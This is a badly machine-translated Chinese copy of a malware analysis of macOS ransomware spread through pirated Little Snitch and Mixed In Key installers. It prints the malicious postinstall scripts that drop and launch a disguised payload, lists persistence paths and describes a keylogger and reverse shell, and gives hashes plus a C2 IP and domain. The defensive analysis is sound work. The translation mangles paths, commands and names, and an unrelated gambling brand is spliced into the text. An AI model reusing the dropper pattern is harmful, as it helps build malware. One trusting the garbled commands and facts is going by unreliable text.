编辑器注意:由于2012年的同名的合法游戏,恶意软件的原始名称已更改。新的名字,小偷的任务,也更适合我们的对恶意软件的最新了解

昨天,一名推特用户在得知俄罗斯一个专门分享torrent链接的论坛上有一个明显恶意的小飞贼安装程序可供下载后,通过handle@beatsballert给我发了一条消息。一篇帖子为《小飞贼》提供了一个torrent下载,很快就有很多评论说下载的内容包含恶意软件。事实上,我们发现不仅是恶意软件,还有一种新的Mac勒索软件变异病毒通过盗版传播。

RUTracker帖子显示指向恶意安装程序的磁铁链接

装置

对这个安装程序的分析表明,肯定发生了一些奇怪的事情。首先,合法的小飞贼安装程序是有吸引力的和专业的包装,与一个良好的定制安装程序,是正确的代码签名。然而,这个安装程序是一个简单的苹果安装程序包,带有一个通用图标。更糟糕的是,安装程序包被毫无意义地分发到磁盘映像文件中。

恶意小告密安装程序

检查此安装程序后发现,它会将原来是合法的Little-Snitch安装程序和卸载程序应用程序以及名为“补丁”的可执行文件安装到/用户/共享/目录。

已安装的文件

安装程序还包含安装后脚本—安装过程完成后执行的shell脚本。这种类型的安装程序通常包含预安装和/或后安装脚本,用于准备和清理,但在这种情况下,该脚本用于加载恶意软件,然后启动合法的Little-Snitch安装程序。

!/ bin / sh mkdir / library / littlesnitchd MV /用户/用户/普通/贴片/图书馆/ Littlesnitchd / CrashReporter RMDIR /用户/ Imils Chmod + X / Library / Littlesnitchd / Crashreporter / Library / Littlesnitchd / Crashrepder开放/用户/ shareed/littlesnitchinstaller.app&

脚本将移动修补文件进入似乎与littlesnitch相关的位置并将其重新创建到Crashreporter.. 由于macOS中有一个名为Crash Reporter的合法流程,如果在Activity Monitor中看到,这个名称将很好地融入其中。然后,它将自己从/用户/共享/文件夹并启动新副本。最后,它启动了小飞贼安装程序。

在实践中,这并没有起到很好的作用。安装了恶意软件,但运行小飞贼安装程序的尝试被无限期地挂断,直到我最终迫使它退出。此外,恶意软件实际上并没有开始加密任何东西,尽管我让它运行了一段时间,并将一些诱饵文件作为自愿的受害者放在适当的位置。

在等待恶意软件做某事的同时 - 任何事情都会调查一个额外的恶意安装程序,对于一个名为key 8中的一些dj软件,以及暗示恶意ableton实时安装程序也存在(虽然这样的安装程序没有尚未发现)。毫无疑问,其他安装人员也没有看到。

混合密钥安装程序非常相似,尽管文件名和postinstall脚本略有不同。

!/ bin / sh mkdir / library / middnkey mv / applications / utils / patch / library / mixibnkey / toolroomdrmdir / application / utils chmod + x / library / miximnkey / toolroomd / library / mixibrnkey / toolroomd&

这一次没有包含启动合法安装程序的代码,只是将混合密钥应用程序直接放入应用程序文件夹中。

感染

一旦通过安装人员触发感染,恶意软件就开始在硬盘周围完全蔓延。两个变体安装了副本修补文件在以下位置:

/library/papquest/com.apple.questd /users/user/library/papquest/com.apple.questd / private/var/root/library/appquest/com.apple.questd.

它还通过启动代理和守护程序Plist文件设置持久性:

/Library/LaunchDaemons/com.apple.questd.plist/Users/user/Library/LaunchAgents/com.apple.questd.plist/private/var/root/Library/LaunchAgents/com.apple.questd.plist

在中找到的每组文件中的后一个/private/var/root/,很可能是由于在用户文件夹中创建文件的代码中存在错误,导致在根用户文件夹中创建文件。由于很少有人真正以root身份登录,因此这没有任何实际用途。

奇怪的是,恶意软件还将自己复制到以下文件:

/users/user/library/.ak5t3o0x2 / private/var/root/library/.5taxr3h3y.

后者与原件完全相同修补文件,但前者以一种非常奇怪的方式修改。它包含了一份副本修补文件,并将该文件中数据的第二个副本附加到末尾,后跟额外的9个字节:十六进制字符串03705701 00CEFAAD DE.. 目前尚不清楚这些文件或附加数据的用途。

更奇怪、更令人费解的是,恶意软件还修改了以下文件:

/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/crashpad_handler/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdate.emon/Users/user/Library/Google/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksdiagnostics/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksfetch/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksinstall

这些文件都是属于GoogleSoftwareUpdate的可执行文件,由于机器上安装了Google Chrome,所以最常见的安装方式是安装GoogleSoftwareUpdate。这些文件包含修补提交给他们,当然意味着恶意代码将在执行任何这些文件时运行。但是,Chrome将看到文件已被修改,并在运行时立即将修改的文件替换为干净的副本,因此目前尚不清楚此处的目的。

行为

通过混合密钥安装程序安装的恶意软件也同样不愿为我开始加密文件。我让它在真正的机器上运行了一段时间,没有结果,然后开始玩系统时钟。在将其提前三天、断开网络连接并重新启动计算机几次后,它终于开始加密文件。

然而,恶意软件在加密哪些文件方面并不特别聪明。它似乎加密了许多设置文件和其他数据文件,例如密钥链文件。这导致登录后加密时出现错误消息。

勒索软件加密钥匙链后显示错误

还有其他非常明显的误差迹象,例如码头重置为其默认外观。

查找器也开始显示出问题的迹象,在选择加密文件时经常出现旋转的海滩球。其他应用程序也会定期冻结,但Finder冻结只能通过强制退出Finder来管理。

虽然其他人报告说,创建了一个文件,其中包含支付赎金的说明,以及显示的警报,甚至还使用文本到语音的方式通知用户他们已感染了赎金软件,但我无法复制其中任何一个,尽管我等了很长一段时间赎金软件才完成。

发布到RUTracker论坛的加密消息截图

能力

恶意软件包括一些反分析技术,在命名的函数中找到is_debugging.is_virtual_mchn.。这与恶意软件很常见,因为具有连接到过程的调试器或在虚拟机内运行的迹象表明恶意软件研究人员正在分析它。在这种情况下,恶意软件通常不会显示其完整功能。

在一个博客帖子在客观上查看Patrick Wardle概述了这两个例程的工作原理。这个is_virtual_mchn.函数实际上并没有显示检查恶意软件是否在虚拟机中运行,而是试图在调整时间的过程中捕捉虚拟机。恶意软件包含延迟并不罕见。例如,有史以来第一个Mac勒索软件KeRanger在感染系统和开始加密文件之间有三天的延迟。这有助于掩盖恶意软件的来源,因为恶意行为可能不会立即与三天前安装的程序相关联。

这加上恶意软件包括名称的函数ei_定时器_创建定时启动,及ei_timer_check.,可能意味着恶意软件在时间延迟运行,尽管尚未知道延迟是什么。

Patrick还指出,由于存在对CGEventTapCreate的调用,该恶意软件似乎包含一个键盘记录器,CGEventTapCreate是一个允许监控按键等事件的系统例程。恶意软件使用此功能的功能尚不清楚。它还向指挥与控制(C2)服务器打开一个反向外壳。

打开问题

仍有许多开放性问题将通过进一步分析来回答。例如,此恶意软件使用哪种加密?它是安全的,还是易于破裂(如在解密FindZip勒索软件加密的文件)? 它是可逆的,还是加密密钥永远不会传回给它背后的罪犯(也像FindZip)?

还有更多的东西需要学习,我们将随着更多的信息被了解而更新这篇文章。

感染后

如果你感染了这种恶意软件,你会想要尽快摆脱它。必威平台APPMac Malwarebytes将检测到这个恶意软件为OSX。偷走任务并移除它。

如果你的文件被加密,我们不确定情况有多糟糕。这取决于加密和密钥的处理方式。进一步的研究可能会找到一种解密文件的方法,也可能不会发生这种情况。

避免勒索软件后果的最佳方法是维护一组良好的备份。保留所有重要数据的至少两个备份副本,并且至少应保留一个备份副本始终保持在您的Mac上。(勒索软件可能会尝试加密或损坏连接的驱动器上的备份。)

我个人有多个硬盘用于备份。我用时光机来维持一对,用复写克隆机来维持一对。其中一个备份总是放在银行的保险箱里,我会定期交换它们,所以在最坏的情况下,我总是将最近的数据存储在一个安全的位置。

如果您有良好的备份,Ransomware对您没有威胁。在最糟糕的情况下,您可以简单地删除硬盘驱动器并从清洁备份恢复。此外,这些备份还可以保护您防止驱动器故障,盗窃,设备的破坏等。

妥协指标

文件

补丁(和com.apple.questd)5A024FFABEA6082031DCDB1E74A7FEC9F60F257CD0B1AB0F698BA2A5BACA6B小飞贼4.5.2.dmg f8d91b8798bd9d5d348beab33604a540e13ce40b88adc096c8f1b3311187e6fa混合键8.dmg B34738E181A6119F23E930476AE949FC0C7C46DEDF003019FA946C4E5B287A

网络

C2服务器167.71.237.219从andrewka6.pythonanywhere[.]com获取的C2地址